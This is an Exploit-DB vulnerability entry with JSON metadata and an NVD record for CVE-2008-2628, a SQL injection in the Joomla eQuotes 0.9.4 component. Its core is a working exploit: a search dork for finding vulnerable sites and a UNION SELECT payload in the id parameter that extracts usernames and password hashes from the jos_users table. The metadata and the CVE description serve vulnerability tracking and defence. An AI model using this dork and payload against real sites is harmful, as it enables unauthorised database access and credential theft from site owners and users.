ID EDB-ID:5723
Type exploitdb
Reporter His0k4
Modified 2008-06-02T00:00:00
Description
Joomla Component equotes 0.9.4 Remote SQL injection Vulnerability. CVE-2008-2628. Webapps exploit for php platform
/---------------------------------------------------------------\
\ /
/ Joomla Component equotes Remote SQL injection \
\ /
\---------------------------------------------------------------/
[*] Author : His0k4 [ALGERIAN HaCkEr]
[*] Dork : inurl:com_eQuotes
[*] POC : http://localhost/[Joomla_Path]/index.php?option=com_equotes&id={SQL}
[*] Example : http://localhost/[Joomla_Path]/index.php?option=com_equotes&id=13 and 1=1 union select user(),concat(username,0x3a,password),user(),user(),user(),user(),user() FROM jos_users--
----------------------------------------------------------------------------
[*] Greetings : Str0ke, all friends & muslims HaCkeRs...
# milw0rm.com [2008-06-02]
{"id": "EDB-ID:5723", "hash": "569c230d5c68f09a11f04b455b1a89a2", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Joomla Component equotes 0.9.4 - Remote SQL Injection Vulnerability", "description": "Joomla Component equotes 0.9.4 Remote SQL injection Vulnerability. CVE-2008-2628. Webapps exploit for php platform", "published": "2008-06-02T00:00:00", "modified": "2008-06-02T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/5723/", "reporter": "His0k4", "references": [], "cvelist": ["CVE-2008-2628"], "lastseen": "2016-01-31T23:29:25", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 7.4, "vector": "NONE", "modified": "2016-01-31T23:29:25"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-2628"]}], "modified": "2016-01-31T23:29:25"}, "vulnersScore": 7.4}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/5723/", "sourceData": "/---------------------------------------------------------------\\\n\\ \t\t\t\t/\n/ Joomla Component equotes Remote SQL injection \\\n\\ \t\t\t\t/\n\\---------------------------------------------------------------/\n\n\n[*] Author : His0k4 [ALGERIAN HaCkEr]\n\n[*] Dork : inurl:com_eQuotes\n\n[*] POC : http://localhost/[Joomla_Path]/index.php?option=com_equotes&id={SQL}\n\n[*] Example : http://localhost/[Joomla_Path]/index.php?option=com_equotes&id=13 and 1=1 union select user(),concat(username,0x3a,password),user(),user(),user(),user(),user() FROM jos_users--\n\n \n----------------------------------------------------------------------------\n[*] Greetings : Str0ke, all friends & muslims HaCkeRs...\n\n# milw0rm.com [2008-06-02]\n", "osvdbidlist": ["46112"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:09:26", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in the eQuotes (com_equotes) component 0.9.4 for Joomla! allows remote attackers to execute arbitrary SQL commands via the id parameter to index.php.", "modified": "2017-09-29T01:31:00", "id": "CVE-2008-2628", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2628", "published": "2008-06-10T00:32:00", "title": "CVE-2008-2628", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
